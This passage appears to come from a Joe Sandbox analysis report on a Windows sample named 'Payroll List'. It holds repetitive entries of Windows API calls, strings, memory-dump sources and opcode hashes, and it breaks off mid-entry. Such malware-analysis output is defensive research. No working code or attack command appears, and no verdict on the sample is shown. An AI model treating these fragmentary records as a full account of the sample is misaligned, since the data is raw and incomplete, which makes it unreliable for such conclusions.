                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001E1708,00000000), ref: 00165120
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1173514356-4108050209
                                                                    • Opcode ID: 3cbeb9ec8cd502e4ede938105f26bc45aae7b4fd3b27ee846511a1db8b3f51d0
                                                                    • Instruction ID: be4a79c14eca1a8c41edb385611490c30998d6c5443003ea5d7b8405897fef0c
                                                                    • Opcode Fuzzy Hash: 3cbeb9ec8cd502e4ede938105f26bc45aae7b4fd3b27ee846511a1db8b3f51d0
                                                                    • Instruction Fuzzy Hash: 8E41F3312057019FD720DF24DC80F6ABBE6AF8A324F044A1EF89697391D730E964CB62
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0016E742
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0016E768
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0016E78D
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0016E7B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID: p1Wu`KXu
                                                                    • API String ID: 3321077145-4063981602
                                                                    • Opcode ID: 9417cf7ffa53ce005d86751e458de6970209dfe903b069f92509a1e992a6eb34
                                                                    • Instruction ID: d8b574aa8003f63500b36f17745805189dfb32b528d364eb1851fc1b801072be
                                                                    • Opcode Fuzzy Hash: 9417cf7ffa53ce005d86751e458de6970209dfe903b069f92509a1e992a6eb34
                                                                    • Instruction Fuzzy Hash: 66415A3A600610DFCF11EF28D445A4DBBE5BF69710F198488E946AB7A2CB30FC51CB95
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 00180587
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharLower
                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                    • API String ID: 2358735015-567219261
                                                                    • Opcode ID: 96ed180cc99f5a7205dd23a8769e683bbfb2088e7c718214702147a4edc44703
                                                                    • Instruction ID: edec9d0d970108d48e787a1fabd9825a91df7dd9e3c06930a5192f5674802c31
                                                                    • Opcode Fuzzy Hash: 96ed180cc99f5a7205dd23a8769e683bbfb2088e7c718214702147a4edc44703
                                                                    • Instruction Fuzzy Hash: 1131A47050021AAFCF01EF54DD419EEB3B4FF65314B10862AE826A76D1EB71EA19CF90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0015B88E
                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0015B8A1
                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 0015B8D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: 0db8475df4b93613d8919ec04bc9e03c267be8b1933748cc54952431c64fbea0
                                                                    • Instruction ID: 6f3ccc65019ca3528a91d1980a9c321dd19a41e5ebe52759117bd70c40c6da00
                                                                    • Opcode Fuzzy Hash: 0db8475df4b93613d8919ec04bc9e03c267be8b1933748cc54952431c64fbea0
                                                                    • Instruction Fuzzy Hash: 27210571900108FFDB18AB64E886DFE777CDF66351B114129F936AB1E0EB744D0A9B60
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0012522F
                                                                    • _wcscpy.LIBCMT ref: 00125283
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00125293
                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00193CB0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                    • String ID: Line:
                                                                    • API String ID: 1053898822-1585850449
                                                                    • Opcode ID: 78191bf011b71881bea88fc2e019ba15b3facd797c44b08d80ea23cfa93504ac
                                                                    • Instruction ID: b80c44f36620124d257bcc3bafc791f95bff30f2a3a300ac626c33c90ae2b3ec
                                                                    • Opcode Fuzzy Hash: 78191bf011b71881bea88fc2e019ba15b3facd797c44b08d80ea23cfa93504ac
                                                                    • Instruction Fuzzy Hash: 6131EF714087A0AFD325EBA0EC86FEE77D8AB54310F00451EF595864D1EB70A6A8CB92
                                                                    APIs
                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00174401
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00174427
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00174457
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0017449E
                                                                      • Part of subcall function 00175052: GetLastError.KERNEL32(?,?,001743CC,00000000,00000000,00000001), ref: 00175067
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                    • String ID:
                                                                    • API String ID: 1951874230-3916222277
                                                                    • Opcode ID: 31ef47aefa3e38fbdc47e3c4ca01018259be451270b8b158e667067f4b788a1c
                                                                    • Instruction ID: bb64e6927f9c5230cbba870665e82e29570291ba6c6aedbd786667bf2de7df45
                                                                    • Opcode Fuzzy Hash: 31ef47aefa3e38fbdc47e3c4ca01018259be451270b8b158e667067f4b788a1c
                                                                    • Instruction Fuzzy Hash: AF21A9B6640608BFE7119BA49C85EBBBAFCEB49748F11C01AF10AA2140EB748D45A770
                                                                    APIs
                                                                      • Part of subcall function 0013D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013D1BA
                                                                      • Part of subcall function 0013D17C: GetStockObject.GDI32(00000011), ref: 0013D1CE
                                                                      • Part of subcall function 0013D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013D1D8
                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0018915C
                                                                    • LoadLibraryW.KERNEL32(?), ref: 00189163
                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00189178
                                                                    • DestroyWindow.USER32(?), ref: 00189180
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                    • String ID: SysAnimate32
                                                                    • API String ID: 4146253029-1011021900
                                                                    • Opcode ID: 3b0fe700209d743ed2571bc12bcc5842f60ef1f771b727073d7798599a78391a
                                                                    • Instruction ID: 3078058d52df82001c35d928951035302e9d353c08df9b61f5e6029406473b06
                                                                    • Opcode Fuzzy Hash: 3b0fe700209d743ed2571bc12bcc5842f60ef1f771b727073d7798599a78391a
                                                                    • Instruction Fuzzy Hash: 4D21DE71204206BBEF206F64DC88EBB37ADEFAA374F180218F915A6190C731CD41AB60
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00169588
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 001695B9
                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 001695CB
                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00169605
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: e8f38d80df40eb59dbe92ef3042ecc4df4bbc7faa0402ac21c2221d7e6891a8f
                                                                    • Instruction ID: 4543f9a334d159bc00989f46a5dbadeba30211a18278234dcdb5f920549ebb55
                                                                    • Opcode Fuzzy Hash: e8f38d80df40eb59dbe92ef3042ecc4df4bbc7faa0402ac21c2221d7e6891a8f
                                                                    • Instruction Fuzzy Hash: E3216071600305ABDB219F29DC05A9A7BFCAF96720F204A1AFDA2D72D0D770D965CB10
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00169653
                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00169683
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00169694
                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001696CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHandle$FilePipe
                                                                    • String ID: nul
                                                                    • API String ID: 4209266947-2873401336
                                                                    • Opcode ID: f0addf7cd558ee0a5e931f16909c7dc377619d6bdb8903fc96510b2cf4f877c0
                                                                    • Instruction ID: 7349e4165b88972067c72df56ae83e2273421b754fcd7fd0ec977b5f97ff3b5d
                                                                    • Opcode Fuzzy Hash: f0addf7cd558ee0a5e931f16909c7dc377619d6bdb8903fc96510b2cf4f877c0
                                                                    • Instruction Fuzzy Hash: 862180716003159BDB209F69DC44E9A77ECAF55730F200A19FCA1E72D0EB70D8A5CB51
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0016DB0A
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0016DB5E
                                                                    • __swprintf.LIBCMT ref: 0016DB77
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,001BDC00), ref: 0016DBB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu
                                                                    • API String ID: 3164766367-685833217
                                                                    • Opcode ID: c614db011d320cd7c22c497fc44fe0dbf247293800174d6e52af516da1f83d48
                                                                    • Instruction ID: ead98aae421ae4585a7791c7ca4a93d2cdcea0de5ace44f4be7dc2bf492ff1a6
                                                                    • Opcode Fuzzy Hash: c614db011d320cd7c22c497fc44fe0dbf247293800174d6e52af516da1f83d48
                                                                    • Instruction Fuzzy Hash: A7216535A00108AFCB10EFA5DD85DEEBBB8EF59704B104069F505D7251DB71EA45CBA1
                                                                    APIs
                                                                      • Part of subcall function 0015C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0015C84A
                                                                      • Part of subcall function 0015C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0015C85D
                                                                      • Part of subcall function 0015C82D: GetCurrentThreadId.KERNEL32 ref: 0015C864
                                                                      • Part of subcall function 0015C82D: AttachThreadInput.USER32(00000000), ref: 0015C86B
                                                                    • GetFocus.USER32 ref: 0015CA05
                                                                      • Part of subcall function 0015C876: GetParent.USER32(?), ref: 0015C884
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0015CA4E
                                                                    • EnumChildWindows.USER32(?,0015CAC4), ref: 0015CA76
                                                                    • __swprintf.LIBCMT ref: 0015CA90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                    • String ID: %s%d
                                                                    • API String ID: 3187004680-1110647743
                                                                    • Opcode ID: 7478331fd4d65ecae5f086115c8953c9d4eafd70ec101ccb62bedbe42cdef30c
                                                                    • Instruction ID: 739e1e8bf4c084ab1b51dff214188e60094e0817b1228962b689b59192505cce
                                                                    • Opcode Fuzzy Hash: 7478331fd4d65ecae5f086115c8953c9d4eafd70ec101ccb62bedbe42cdef30c
                                                                    • Instruction Fuzzy Hash: F2117F71600309BFCF11BFA0DC85FE93B69AB55715F008066FE29AB182DB749949DBB0
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001819F3
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00181A26
                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00181B49
                                                                    • CloseHandle.KERNEL32(?), ref: 00181BBF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                    • String ID:
                                                                    • API String ID: 2364364464-0
                                                                    • Opcode ID: f2458eedbf3ae8f77ce264cec65f6ea15d30976d4cb10491cdec638406b9ace5
                                                                    • Instruction ID: 9a4e2808768f2a17c12f29fdec25217e43fb5767341d3685f913a8c608271946
                                                                    • Opcode Fuzzy Hash: f2458eedbf3ae8f77ce264cec65f6ea15d30976d4cb10491cdec638406b9ace5
                                                                    • Instruction Fuzzy Hash: 62815171600214ABDF14AF64C886BADBBF9BF18720F148459F909AF382D7B5A941CF90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0018E1D5
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0018E20D
                                                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 0018E248
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0018E269
                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0018E281
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                                                    • String ID:
                                                                    • API String ID: 3188977179-0
                                                                    • Opcode ID: b25fa93ae3d202a92036a6e344a11ee96b757dd8c6ed4fdb66052a48716ec26a
                                                                    • Instruction ID: d2a0a51b66908fc29839db46dcfdd90e7134d95b17f3d7a7a54f2c770fedd7ac
                                                                    • Opcode Fuzzy Hash: b25fa93ae3d202a92036a6e344a11ee96b757dd8c6ed4fdb66052a48716ec26a
                                                                    • Instruction Fuzzy Hash: DA619E74A04644AFDB24EF58C899FEE77FAAB89300F144459F95A972A1C771AA80CF10
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 00161CB4
                                                                    • VariantClear.OLEAUT32(00000013), ref: 00161D26
                                                                    • VariantClear.OLEAUT32(00000000), ref: 00161D81
                                                                    • VariantClear.OLEAUT32(?), ref: 00161DF8
                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00161E26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                    • String ID:
                                                                    • API String ID: 4136290138-0
                                                                    • Opcode ID: a591f342f781305e55d843b96bba8e7907775d5e46e11021244b1933898077eb
                                                                    • Instruction ID: 8bb3305d63d73112c2f44d137c7619e3222ca01be197db793ccb92efc6458be5
                                                                    • Opcode Fuzzy Hash: a591f342f781305e55d843b96bba8e7907775d5e46e11021244b1933898077eb
                                                                    • Instruction Fuzzy Hash: E85148B5A00209EFDB14CF58D884AAAB7B8FF4D314B198559ED59DB301E730EA51CFA0
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 001806EE
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0018077D
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0018079B
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 001807E1
                                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 001807FB
                                                                      • Part of subcall function 0013E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0016A574,?,?,00000000,00000008), ref: 0013E675
                                                                      • Part of subcall function 0013E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0016A574,?,?,00000000,00000008), ref: 0013E699
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 327935632-0
                                                                    • Opcode ID: a265a3ea02f20df27444cb24b95aa935d92dc6bf6f4664af85964f8e52e33a0d
                                                                    • Instruction ID: 056833d00718ae2a14f46967f1b08fa9d80a577d0222d8fd7188fac06f2cafdf
                                                                    • Opcode Fuzzy Hash: a265a3ea02f20df27444cb24b95aa935d92dc6bf6f4664af85964f8e52e33a0d
                                                                    • Instruction Fuzzy Hash: 1E514775A00219DFCB01EFA8D8819ADB7B5BF6D310F058059EA56AB352DB30EE45CF90
                                                                    APIs
                                                                      • Part of subcall function 00183C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00182EEF
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00182F2E
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00182F75
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00182FA1
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00182FAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                     • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 3740051246-0
                                                                    • Opcode ID: 17ae7d16dac382a7c1a9a1a57a0a7fa50926e2bccf778c395915bac9e9d1f7c3
                                                                    • Instruction ID: 722b447192e10d2a10d09330a03539854b222077c04e90a11e791a9afa279ea3
                                                                    • Opcode Fuzzy Hash: 17ae7d16dac382a7c1a9a1a57a0a7fa50926e2bccf778c395915bac9e9d1f7c3
